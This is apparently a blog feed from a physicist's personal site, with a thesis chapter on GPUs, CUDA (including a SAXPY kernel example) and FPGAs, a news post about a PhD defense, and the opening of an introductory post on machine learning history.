<p>Nvidia introduced the Compute Unified Device Architecture (CUDA) in 2006, sparking what is now known as General-Purpose Graphics Processing Unit (GPGPU) computing <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>. This marked a revolution in computing: previously, GPUs were dedicated chips designed to accelerate 3D rendering tasks for gaming and graphics applications. With CUDA, GPUs became programmable parallel processors equipped with hundreds of processing elements, enabling them to perform a broad range of tasks traditionally tackled using CPUs. This can include scientific computing (simulations, climate, etc.), financial modeling, signal processing, machine learning and deep learning. For the first time, Nvidia provided a dedicated programming model and language for its GPUs, enabling developers to write general-purpose code that could run directly on the GPU—something that was previously not possible with such flexibility and ease.</p>

<p>CUDA is a proprietary language, which led to the need for a standardized parallel programming language that could be used across GPUs from different manufacturers. In response, OpenCL <a href="https://www.khronos.org/opencl/">[Ref]</a> was defined by Khronos Group as an open standard. It allows the development of code compatible with both GPU and CPU. This emphasis on portability—the ability to write a single kernel that can run across heterogeneous platforms—made OpenCL the second most popular HPC tool at the time <a href="https://sdtimes.com/amd/amd-helps-opencl-gain-ground-in-hpc-space/">[Ref]</a>.</p>

<p>In the 2010s, GPUs were used in consoles such as the PlayStation 4 and the Xbox One <a href="https://www.extremetech.com/gaming/156273-xbox-720-vs-ps4-vs-pc-how-the-hardware-specs-compare">[Ref]</a>, and on automotive systems, after Nvidia partnered with Audi to power car dashboard displays <a href="https://news.softpedia.com/news/NVIDIA-Tegra-Inside-Every-Audi-2010-Vehicle-131529.shtml">[Ref]</a>. Nvidia architectures developed further, increasing the number of CUDA cores and further adding the new technology of the so-called tensor cores <a href="https://www.polygon.com/2018/8/20/17760038/nvidia-geforce-rtx-2080-ti-2070-specs-release-date-price-turing">[Ref]</a>. Tensor cores were designed to bring better performance to deep learning operations. Real-time ray tracing—simulation of reflections, shadows, depth of field, etc.—debuted with Nvidia RTX 20 series in 2018 <a href="https://www.nvidia.com/en-us/geforce/news/nvidia-dlss-2-0-a-big-leap-in-ai-rendering/">[Ref]</a>.</p>

<p>In 2020s, after the deep learning explosion from 2012 onwards, GPUs are heavily used in the training and inference of large language models, such as the ChatGPT <a href="https://openai.com/index/chatgpt/">[Ref]</a> chatbot by OpenAI. This surge in interest of dedicated hardware, infrastructure and electricity to support these heavy models has created a booming artificial intelligence ecosystem. It is further fueling a re-evaluation of our electricity needs, infrastructure organization, and the direction of hardware development, while also raising questions about the feasibility of continued scaling.</p>

<h2 id="cuda-programming-model">CUDA Programming Model</h2>

<p>Introduced in 2006 by Nvidia <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>, CUDA is a parallel programming model designed for developing general purpose applications that leverage the parallelization capabilities and architecture of Nvidia GPUs. It can be thought of as an Application Programming Interface (API) that allows software to access the GPU’s virtual instruction set and parallel computation elements for the execution of compute kernels.</p>

<p>The C++ version of CUDA is a language extension of C++ that allows the programmer to define specific parallel functions called kernels, and run code on CPU and GPU using a single language <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>. By splitting the code into a <em>host</em> (traditional CPU) and a <em>device</em> (GPU) part, the instructions dictated by the CPU are executed on the GPU. The device code is organized into kernels, and kernels are executed by the threads available on the GPU. Multiple threads execute the same kernel simultaneously, in the so-called Single Instruction, Multiple Threads (SIMT) execution model. SIMT can be thought of as a subcategory of SIMD. In SIMD, a single thread executes an instruction on multiple data. On the other hand, in SIMT, a small group of threads called a warp executes the same instruction on multiple data, but each thread has its own independent program counter, stack and registers, so threads can have divergent execution. This per-thread autonomy gives more flexibility to the SIMT execution model.</p>

<h3 id="memory-hierarchy">Memory Hierarchy</h3>

<p>In the CUDA programming model, threads are organized into blocks. In particular, threads that execute the same instruction are grouped into warps and several warps constitute a thread block. Blocks of threads are further organized into grids. These two levels—blocks and grids—correspond to different communication bandwidths and shared memory capacities. Blocks have shared memory that is accessible to all threads in the block, while threads from the different blocks only share the view of the device memory. The model is summarized in Fig. 4.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/threads-blocks.png" alt="threads-blocks" /></p>

<p><strong>Figure 4:</strong> CUDA thread and memory hierarchy. Figure from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/memory.png" alt="memory" /></p>

<p><strong>Figure 5:</strong> Illustration of the memory hierarchy for a Single Instruction, Multiple Threads (SIMT) program. Inspired by <a href="https://jdriven.com/blog/2024/02/gpu_part2/">[Ref]</a>.</p>

<p>Register memory, is the fastest kind of memory but is of the smallest size, usually around 1 KB per thread. Shared memory, on the other hand, is slower, accessible by all the threads within a block, and is usually on the order of hundreds of kilobytes. The device memory, even slower, is accessible by all the threads of the device and is what is commonly known as Random Access Memory (RAM). As of 2025, most modern GPUs do not go over 80 GB of RAM. Finally, the host RAM is the most costly, in terms of access latency. The memory hierarchy is illustrated in Fig. 5, along with Fig. 4.</p>

<h3 id="architecture">Architecture</h3>

<p>The GPU delivers significantly higher instruction throughput and memory bandwidth than the CPU, all with similar cost and power range. Various applications take advantage of these enhanced capabilities compared to the CPU, such as GPGPU programming. While FPGAs are also energy-efficient, GPUs offer unmatched programming flexibility.</p>

<p>This difference stems from fundamental design differences. The CPU is optimized to execute a series of operations, by a single thread, at the highest clock frequency possible, and can handle a few dozen concurrent threads. In contrast, GPUs are designed to run thousands of threads in parallel, exploiting data parallelism, but at a lower frequency. However, by trading off individual speed, a much higher overall throughput can be achieved.</p>

<p>To support this level of parallelism, GPUs devote more transistors to data processing rather than to data caching and control logic. This design philosophy is illustrated in Fig. 6, which compares the typical allocation of resources between a CPU and a GPU.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/cpu-gpu.png" alt="cpu-gpu" /></p>

<p><strong>Figure 6:</strong> Comparison of the allocation of resources between a CPU and a GPU. Figure from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<p>Nvidia’s GPU architecture is an array of the so-called Streaming Multiprocessors (SMs). A multithreaded program is divided into thread blocks that run independently of one another. When a kernel is launched over several blocks, the blocks are distributed across the available SMs for execution. An SM can execute multiple blocks simultaneously. On a GPU with more SMs, the program will be executed automatically in less time than a GPU with fewer multiprocessors. In this way, scaling is automatically guaranteed.</p>

<h3 id="c-extension">C++ Extension</h3>

<p>In the C++ version of CUDA, compute kernels are defined as C++ functions using the <code class="language-plaintext highlighter-rouge">__global__</code> declaration specifier. The launch of the kernel is defined using the CUDA execution configuration syntax <code class="language-plaintext highlighter-rouge">&lt;&lt;&lt;K,M&gt;&gt;&gt;(...)</code>. In this way, a kernel is launched on <code class="language-plaintext highlighter-rouge">K</code> blocks per grid, each with <code class="language-plaintext highlighter-rouge">M</code> threads, and is executed in parallel by the active threads. Furthermore, CUDA exposes built-in variables that can be accessed by the developer. In particular, <code class="language-plaintext highlighter-rouge">threadIdx</code> gives the identifier of the thread currently executing and <code class="language-plaintext highlighter-rouge">blockDim</code> gives the block dimension, i.e., the number of threads in each block—<code class="language-plaintext highlighter-rouge">M</code> above. Finally, <code class="language-plaintext highlighter-rouge">blockIdx</code> gives the identifier of the block currently in execution. These three variables are 3-component vectors, providing a natural way to invoke computations on vectors, matrices and volumes.</p>

<p>As an example, in Listing 1, an implementation of “Single-precision A*X Plus Y (SAXPY)” <a href="https://developer.nvidia.com/blog/easy-introduction-cuda-c-and-c/">[Ref]</a> is presented, a basic function of the Basic Linear Algebra Subroutines (BLAS) library, in CUDA/C++. The saxpy function takes two \(n\)-dimensional input vectors, \(\mathbf{x}\) and \(\mathbf{y}\), as well as a scalar \(a\). It then computes the expression \(a \times (\mathbf{x})_i + (\mathbf{y})_i\), and stores the result in \(\mathbf{y}\). In the host code, we start by moving the prepared data of \(\mathbf{x}\) and \(\mathbf{y}\) from the host to the device. We then invoke the kernel with 4096 blocks, of 256 threads each, for a total of 1048576 active threads (line 21). In this way we launch exactly the number of threads we need to perform the calculation on the number of elements \(N=1\,048\,576\). Each thread is supposed to perform the calculation of each element independently, so in the device code, threads first calculate the index of the element they need to calculate (line 4). After checking that this index does not exceed the length of the vector \(n\) (line 5), they then perform the calculation (line 6). The data are moved from the host to the device and back using API calls (lines 16, 17, 24).</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Device code (kernel definition)</span>
<span class="n">__global__</span> <span class="kt">void</span> <span class="nf">saxpy</span><span class="p">(</span><span class="kt">int</span> <span class="n">n</span><span class="p">,</span> <span class="kt">float</span> <span class="n">a</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">blockIdx</span><span class="p">.</span><span class="n">x</span><span class="o">*</span><span class="n">blockDim</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">threadIdx</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">&lt;</span> <span class="n">n</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">y</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">a</span><span class="o">*</span><span class="n">x</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">y</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="n">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="c1">// ...</span>
  <span class="kt">int</span> <span class="n">N</span> <span class="o">=</span> <span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">20</span><span class="p">;</span> <span class="c1">// 2^20 = 1048576</span>

  <span class="c1">// Copy data from host to device</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">x_device</span><span class="p">,</span> <span class="n">x_host</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyHostToDevice</span><span class="p">);</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">y_device</span><span class="p">,</span> <span class="n">y_host</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyHostToDevice</span><span class="p">);</span>

  <span class="c1">// Perform SAXPY on 1M elements</span>
  <span class="c1">// Invoke kernel with 4096 blocks of 256 threads each</span>
  <span class="n">saxpy</span><span class="o">&lt;&lt;&lt;</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">256</span><span class="o">&gt;&gt;&gt;</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="mf">2.0</span><span class="n">f</span><span class="p">,</span> <span class="n">x_device</span><span class="p">,</span> <span class="n">y_device</span><span class="p">);</span>

  <span class="c1">// Transfer result back to the host</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">y_host</span><span class="p">,</span> <span class="n">y_device</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyDeviceToHost</span><span class="p">);</span>

  <span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>
<p><strong>Listing 1:</strong> Saxpy implementation in CUDA C++. Adapted from <a href="https://developer.nvidia.com/blog/easy-introduction-cuda-c-and-c/">[Ref]</a>.</p>

<p>CUDA threads operate on a physically separate device to the host running the C++ script. The kernel is invoked by the host, but it runs on the device. The execution model is illustrated in Fig. 7.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/hetero.png" alt="hetero" /></p>

<p><strong>Figure 7:</strong> Illustration of heterogeneous programming using the CUDA programming model. Adapted from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<h2 id="programmable-logic">Programmable Logic</h2>

<p>While GPUs are programmable parallel processors designed for general-purpose computing, FPGAs are electronic chips that enable the integration of dedicated parallel architectures. The FPGA sprouted from developments in technology around programmable logic, and in particular from Programmable Read-Only Memory (PROM) and Programmable Logic Devices (PLDs). Both PROMs and PLDs could be programmed outside the factory, i.e., in the field, which explains the “field-programmable” part of the abbreviation <a href="https://digilent.com/blog/history-of-the-fpga/">[Ref]</a>.</p>

<p>Altera, founded in 1983, produced the first erasable programmable ROM circuit in 1984. However, Xilinx delivered the first commercial field-programmable gate array in 1985, the XC2064. Until the mid-1980s, FPGAs were only used in networking and telecommunications. However, by the end of the decade, FPGAs had been adopted across consumer, automotive, and industrial applications <a href="https://shop.elsevier.com/books/the-design-warriors-guide-to-fpgas/maxfield/978-0-7506-7604-5">[Ref]</a>. With the AI boom around the 2010s, FPGAs are increasingly being used for applications in constrained environments and for prototyping.</p>

<p>FPGAs are extremely versatile due to the fact that they are reconfigurable. This allows developers to test numerous designs after the board has been built. When changes to the design are required, the device is simply restarted and the configuration file, usually called the bitstream, is transferred onto the device.</p>

<p>In particular, FPGAs are crucial for designing Application-Specific Integrated Circuits (ASICs).
The manufacture of ASICs is extremely costly, so before a design is decided and put into production, it has to be prototyped. The digital hardware design is then verified and finalized.</p>

<h2 id="field-programmable-gate-arrays">Field-Programmable Gate Arrays</h2>

<p>The most common FPGA architecture includes an array of Configurable Logic Blocks (CLBs), Input/Output (I/O) cells, and routing channels <a href="https://doi.org/10.48550/arXiv.2209.11158">[Ref]</a>, as illustrated in Fig. 8. The CLB typically consists of a Lookup Table (LUT) and a clocked Flip-Flop (FF). An LUT of \(n\)-bit input can encode any Boolean function of \(n\) inputs by simply storing the value of the function for each input, i.e., by storing its truth table. FFs on the other hand, are used to register the value of the output of the logic function and to synchronize the data with the system clock. In this way, by storing the value of a state, sequential logic can be implemented. The routing channels are used to interconnect the logic blocks, and the I/O pads are used for interfacing with external signals. By “configuring” an FPGA, the developer can define the arrangement of these logic gates and their connections, in order to implement a series of operations such as additions, subtractions and logical operations.</p>

<p>FPGAs are often also equipped with Digital Signal Processing (DSP) blocks, responsible for performing more complex operations such as multiplications and divisions. These operations become more and more complex as the bit width of the operands increases. Furthermore, Block RAM (BRAM) is often added on the CLB grid, to enable the storage of large amounts of data inside the FPGA.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/fpga.png" alt="fpga" /></p>

<p><strong>Figure 8:</strong> Illustration of the structure of an FPGA, highlighting its three fundamental digital logic components: Configurable Logic Blocks (CLBs), Input/Output (I/O) pads, and routing channels. Inspired by <a href="https://www.eecg.toronto.edu/~vaughn/challenge/fpga_arch.html">[Ref]</a>.</p>

<h3 id="system-on-a-chip-fpgas">System on a Chip FPGAs</h3>

<p>Often, FPGAs are sold as a System on a Chip (SoC). The SoC board is divided into two parts, the Processing System (PS) and the Programmable Logic (PL), as shown in the block diagram in Fig. 9. This type of diagram is a high-level representation showing the main functional components of the FPGA and how these are connected. It is used to understand the internal organization of the chip.</p>

<p>The PS is a traditional CPU, while the PL is the traditional reconfigurable FPGA part. SoCs comprise many execution units. These units communicate by sending data and instructions between them. A very common data bus for SoCs is ARM’s Advanced Microcontroller Bus Architecture (AMBA) standard. Direct memory access controllers transfer data directly between external interfaces and the SoC memory, bypassing the CPU or control unit, which enhances the overall data throughput of the SoC.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/ps-pl-soc.png" alt="ps-pl-soc" /></p>

<p><strong>Figure 9:</strong> Block diagram illustration of a System on a Chip (SoC) FPGA, highlighting the division between the processing system and the programmable logic part, as well as the communication between them.</p>

<h3 id="development">Development</h3>

<p>In order to configure FPGAs, a developer needs to use a specialized computer language called Hardware Description Language (HDL). This type of language is used for describing the structure and behavior of electronic circuits, usually for ASICs and FPGAs. This design abstraction is known as Register-Transfer Level (RTL), modeling the digital logic circuit in terms of the flow of signals between the registers <a href="https://books.google.fr/books?id=-YayRpmjc20C">[Ref]</a>. HDLs differ from normal programming languages because they describe concurrent hardware operations and timing behavior rather than sequential instruction execution. Because of this particularity, FPGA programming is notoriously difficult and comes with a high resource cost.</p>

<p>After the RTL description has been validated with test benches, the design is synthesized and the RTL description is translated to the gate-level description of the circuit. Finally, the design is laid out and routed on the FPGA.</p>

<h3 id="high-level-synthesis">High-Level Synthesis</h3>

<p>In order to avoid the cost related to developing FPGAs, various tools have been designed to abstract out the complexity in configuring FPGAs. One particularly well-known tool is High-Level Synthesis (HLS) <a href="https://doi.org/10.1109/5.52214">[Ref]</a>. It is an automated process that takes an abstract high-level description, in languages such as C, C++ and MATLAB, of a digital system and produces the RTL architecture that realizes the given behavior. The code at the algorithmic level is analyzed, architecturally constrained, and scheduled for transcompilation into an RTL design in HDL, which is then typically synthesized to the gate level using a logic synthesis tool.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this article, I introduced parallelism, briefly summarized the histories of GPUs and FPGAs, and presented the CUDA programming model. I also described the architecture of FPGAs and touched upon the nuances of their design. While CPU remains the strongest candidate for general-purpose, control-intensive, and sequential tasks, offering flexibility and ease of programming, they lack in ability to parallelize at large scale. GPUs on the other hand are well-suited for highly parallel, throughput-oriented tasks, particularly those with structured, data-parallel workloads. FPGAs provide customizable hardware-level parallelism with low latency and high energy efficiency, ideal for real-time and resource-constrained applications. However, their programming complexity remain significant barriers. This comparison is illustrated in Fig. 10. The choice between the different architectures presented depends on many factors, including performance, energy efficiency, flexibility and cost. Understanding the trade-offs between these architectures is crucial for designing optimized pipelines that meet specific requirements on throughput, latency or power consumption.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/flexibility_performance.png" alt="flexibility_performance" /></p>

<p><strong>Figure 10:</strong> Illustration of a comparison of different processor architectures based on their flexibility and their performance potential.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider (LHC) at CERN.</p>

<p>HPC and parallelism have emerged as essential components of the processing infrastructure at LHC experiments at CERN. This development is largely driven by the need for Real-Time Analysis (RTA) at increasingly higher data rates. Meeting the stringent requirements for latency and throughput in such environments demands both specialized hardware and modern computing paradigms. Furthermore, specific types of hardware architectures are particularly interesting for exploiting parallelism in order to perform real-time analysis in high-energy physics, such as the GPU and FPGA architectures.</p>

<p>The background presented is crucial in understanding the computational aspects of the thesis work as well as the motivations behind it. HPC is particularly motivated by the need to perform RTA, which requires specific hardware and computing paradigms—such as parallel programming—in order to meet the strict latency and throughput constraints imposed by the extreme data rate environments at LHC experiments.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="HPC" /><category term="GPU" /><category term="CUDA" /><category term="FPGA" /><summary type="html"><![CDATA[Brief introduction to parallelism, high-performance computing, GPUs and FPGAs. The histories of GPUs and FPGAs are briefly summarized, and the CUDA programming model is presented.]]></summary></entry><entry><title type="html">PhD Thesis Successfully Defended</title><link href="https://fotisgiasemis.com/news/phd-defense/" rel="alternate" type="text/html" title="PhD Thesis Successfully Defended" /><published>2025-09-07T00:00:00+02:00</published><updated>2025-09-07T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/phd-defense</id><content type="html" xml:base="https://fotisgiasemis.com/news/phd-defense/"><![CDATA[<p>I successfully defended my PhD thesis on September 5, 2025. The thesis</p>

<blockquote>
  <p><strong>Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures</strong></p>
</blockquote>

<p>explores how modern machine learning models can be deployed efficiently in high-energy physics environments, with a focus on maximizing <strong>throughput</strong> and minimizing <strong>energy</strong> consumption. The page from the day of the defense is <a href="https://indico.in2p3.fr/e/fotis-giasemis-phd-defense">here</a>.</p>

<p><img src="/assets/images/defense-jury.jpg" alt="defense-jury" /></p>

<p>The doctoral committee comprised the following members:</p>

<ul>
  <li><strong>Pierre Astier</strong> (jury president)</li>
  <li><strong>Jean Christophe Prévotet</strong> (reviewer)</li>
  <li><strong>David Rousseau</strong> (reviewer)</li>
  <li><strong>Eluned Anne Smith</strong> (committee member)</li>
  <li><strong>Nicolas Gac</strong> (committee member)</li>
  <li><strong>Vladimir Vava Gligorov</strong> (supervisor)</li>
  <li><strong>Bertrand Granado</strong> (supervisor)</li>
</ul>

<p>You can access the final version of my <strong>thesis</strong> on <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv</a>, and all the related resources on my earlier post <a href="/news/phd-thesis">PhD Thesis Now Online</a>.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis defense: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">From Machine Learning to Graph Neural Networks and Quantization – An Introduction</title><link href="https://fotisgiasemis.com/blog/ml-gnn-intro/" rel="alternate" type="text/html" title="From Machine Learning to Graph Neural Networks and Quantization – An Introduction" /><published>2025-08-13T00:00:00+02:00</published><updated>2025-08-13T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/ml-gnn-intro</id><content type="html" xml:base="https://fotisgiasemis.com/blog/ml-gnn-intro/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>This post is a short and pedagogical introduction to the field of <strong>Machine Learning (ML)</strong> and its brief history, its subfields Deep Learning (DL) and <strong>Graph Neural Networks (GNNs)</strong>, as well as some important techniques highly relevant to the field of ML and the deployment of ML models in <strong>high-throughput</strong> or <strong>resource-constrained</strong> contexts.</p>

<blockquote>
  <p>Parts of this text were inspired by <a href="https://www.deeplearningbook.org">[Ref]</a> and <a href="https://themlbook.com">[Ref]</a>.</p>
</blockquote>

<h2 id="machine-learning">Machine Learning</h2>

<p>Machine learning is the field of how machines—specifically computers—can “learn”. Although “learn” is perhaps a generous term, it refers to how computers manage to do specific tasks without being explicitly programmed to do them. Unlike classical algorithms, which follow hand-crafted rules defined by developers, ML algorithms, and by consequence ML models, are data-driven: By an iterative process of providing data to the ML model, the model is <em>trained</em> and progressively learns to perform a task solely based on the data it has been given. At the end of this process, without the need for the developer to describe the logic of the algorithm itself, the model can carry out the task effectively without the developer needing to explicitly define how it should be done.</p>

<p>The term machine learning is believed to have been coined by Arthur Samuel in 1959 for his work on programming a computer to play checkers <a href="https://doi.org/10.1147/rd.33.0210">[Ref]</a>. In general, Artificial Intelligence (AI) is considered as a more general term than ML, as shown in Fig. 1. Strictly speaking it refers to the capability of computational systems to mimic tasks which normally require human intelligence, such as learning, reasoning, decision-making, and problem solving. However, the two terms ML and AI are often used interchangeably.</p>

<p><img src="/assets/ml-gnn-intro/ai-ml-dl.png" alt="ai-ml-dl" /></p>

<p><strong>Figure 1:</strong> Euler diagram of AI and its subfields as relevant to this post.</p>

<p>Classical, or probabilistic, ML has been in use long before the term ML came into existence. These algorithms are statistical models that try to capture relationships between various variables. Arguably, the most famous example is linear regression, originally developed by Isaac Newton for his work on the equinoxes around 1700 <a href="https://doi.org/10.1098/rsnr.2005.0096">[Ref]</a>, and later formalized by Legendre and Gauss in the early 19th century <a href="http://archive.org/details/historyofstatist00stig">[Ref]</a>.</p>

<p>The performance of these simple ML algorithms strongly depends on the <em>representation</em> of the data they are given. For example, as illustrated in Fig. 2, the coordinate system used: Switching from Cartesian to polar coordinates might have a dramatic impact on the performance of an algorithm in solving a specific task. Each piece of information included in the representation of a data class, coordinates \(x \), \(y \) and \(r \), \(\theta \) in our example in Fig. 2, is known as a <em>feature</em>. Linear regression tries to capture the relationship between these features, the independent variables, and the dependent variables. However, it cannot influence our choice for the definition of the features to be used.</p>

<p><img src="/assets/ml-gnn-intro/coordinate_transform.png" alt="coordinate_transform" /></p>

<p><strong>Figure 2:</strong> Example of different representations: Suppose we want to separate two classes of data by drawing a line between them. If the data are represented in Cartesian coordinates (left) the task is impossible. On the other hand, when the same points are represented in polar coordinates (right), the task becomes very simple to solve with a vertical separator.</p>

<p>Many ML tasks can be efficiently solved by designing the right set of features for that task, and then providing these features to a simple machine learning algorithm. As an example, imagine we have a set of images of either grass fields or the sea. What feature can we design to separate the two groups of images? We could find the average color of all the pixels and if the average is close to green then we would label the photo as “grass”, while if it is close to blue as “sea”. We can be confident that with this simple feature we have extracted, the performance of our classification algorithm is likely to be adequate for this task.</p>

<p>However, what happens if we pass each photo through a color filter, changing the color of the pixels? In this case, the algorithm breaks down completely. However, to a human eye, the classification task remains identically easy. So, how do we capture the “seaness” of the sea and the “grassness” of the grass? This is exactly where things get difficult. It is not obvious how to design a feature exactly in order to capture, for example, the texture of the grass in terms of pixel values. This is where <em>representation learning</em>, also known as feature learning, comes in. It is a set of techniques that allows a system to automatically discover the representation needed for a specific problem, completely bypassing the need for hand-designing. And as it turns out, learned representations often result in much better performance than hand-designed ones <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>

<p>Deep learning is a form of representation learning and involves Neural Networks (NNs) with multiple layers. The NN learns hierarchical representations of data, i.e from low-level (e.g., edges in images) to high-level features (e.g., faces, objects). Frank Rosenblatt is attributed with introducing the <em>perceptron</em> in 1958 <a href="https://doi.org/10.1037/h0042519">[Ref]</a>. Combining multiple of these perceptrons arranged in layers results in the so-called Multilayer Perceptron (MLP), also known as a Feedforward Neural Network (FNN). The first MLP trained by stochastic gradient descent <a href="https://doi.org/10.1214/aoms/1177729586">[Ref]</a> was published by Shun’ichi Amari in 1967 <a href="https://doi.org/10.1109/PGEC.1967.264666">[Ref]</a>. The ReLU (Rectified Linear Unit) activation function, introduced in 1969 by Kunihiko Fukushima <a href="https://doi.org/10.1109/TSSC.1969.300225">[Ref]</a>, has now become the most popular activation function for deep learning <a href="https://doi.org/10.48550/arXiv.1710.05941">[Ref]</a>. Finally, the modern form of backpropagation was first published in 1970 by Seppo Linnainmaa <a href="https://doi.org/10.1007/BF01931367">[Ref]</a>. The method applied to neural networks was popularized by David E. Rumelhart et al. in 1986 <a href="https://doi.org/10.1038/323533a0">[Ref]</a>.</p>

<p>During the 1990s, introduced by Yann LeCun <a href="https://doi.org/10.1109/5.726791">[Ref]</a>, Convolutional Neural Networks (CNNs) marked a major breakthrough. In his seminal work, he proposed the LeNet-5 architecture, which utilized convolutional layers to recognize hand-written digits from the MNIST database—a significant shift from traditional fully connected layers.</p>

<h3 id="the-revolution">The Revolution</h3>

<p>The ML/DL revolution was kick-started by CNN-based computer vision in 2012 <a href="https://papers.nips.cc/paper_files/paper/2012/hash/c399862d3b9d6b76c8436e924a68c45b-Abstract.html">[Ref]</a>, driven by advancements in computation, particularly the graphics processing unit. Although CNNs trained via backpropagation had existed for decades, and neural networks—including CNNs—had already been implemented on GPUs for years <a href="https://doi.org/10.1016/j.patcog.2004.01.013">[Ref]</a>, advancements in computer vision required faster GPU implementations. At the same time, in 2006, GPUs became programmable with Nvidia’s CUDA framework <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>. As deep learning gained widespread adoption, specialized hardware and optimized algorithms were subsequently developed to meet its growing demands <a href="https://doi.org/10.48550/arXiv.1703.09039">[Ref]</a>. In 2009, Rajat Raina et al. demonstrated an early example of GPU-accelerated deep learning by training a 100-million-parameter deep belief network using 30 Nvidia GeForce GTX 280 GPUs <a href="https://doi.org/10.1145/1553374.1553486">[Ref]</a>. Their approach achieved training speeds up to 70 times faster than traditional CPU-based methods.</p>

<p>Another reason why deep learning has only recently gained such traction is the availability of data in the era of “big data”. ML algorithms are data-driven and in fact need a large amount of data in order to be able to be trained and to generalize well on unseen data. With the increasing digitization of society, data became abundant. Furthermore, it was possible to gather all these records and curate them into large datasets appropriate for training ML models.</p>

<p>Finally, even more recently, advances in Natural Language Processing (NLP) are beginning to transform our everyday lives. This was largely initiated by a novel architecture called <em>transformer</em>, introduced by Google researchers in 2017 <a href="https://doi.org/10.48550/arXiv.1706.03762">[Ref]</a>, which was based mainly on the attention mechanism developed by Bahdanau et al. <a href="https://doi.org/10.48550/arXiv.1409.0473">[Ref]</a>. Based on the transformer architecture, Large Language Models (LLMs) can be constructed, containing billions of trainable parameters. One popular example is the chatbot “ChatGPT” <a href="https://openai.com/index/chatgpt/">[Ref]</a> which has an impressive ability to respond to various questions, and in diverse contexts, in a remarkably human-like manner. Ever since the introduction of the chatbot, the field of AI has been increasingly becoming the spotlight of attention, driving advancements and drawing the interest of academia, industry, and the public. However, the true capabilities of LLMs remain insufficiently understood <a href="https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf">[Ref]</a>.</p>

<h3 id="the-learning-procedure">The Learning Procedure</h3>

<p>We now turn to the fundamental concepts related to the process of training a machine learning model. ML has a diverse set of application tasks including classification, regression, clustering, anomaly detection, transcription, denoising, density estimation and more. Each of these tasks has different specific requirements and objectives and hence the training procedure is different and focuses on optimizing different evaluation metrics. However, in general, ML algorithms can be broadly categorized as unsupervised or supervised based on their learning process.</p>

<p><strong>Unsupervised learning algorithms</strong> have access to the entirety of a dataset containing various features, and learn useful properties and characteristics of the structure of this dataset. Clustering, for example, is possibly the most important unsupervised learning problem. It attempts to organize the elements of a dataset into groups which are similar in some way.</p>

<p>In high-energy physics, clustering plays a central role across many stages of data processing. For example, in pixel detectors, clustering is used to group adjacent hits in the sensor planes that are likely to have originated from the same charged particle, forming the basis for subsequent track reconstruction. Similar techniques are applied in calorimetry to group energy deposits and in jet reconstruction to cluster final-state particles.</p>

<p>While clustering is commonly framed as an unsupervised learning task, it can also appear in supervised or semi-supervised contexts, especially when the goal is to learn a model that mimics or improves upon a known clustering procedure, such as in learned jet tagging.</p>

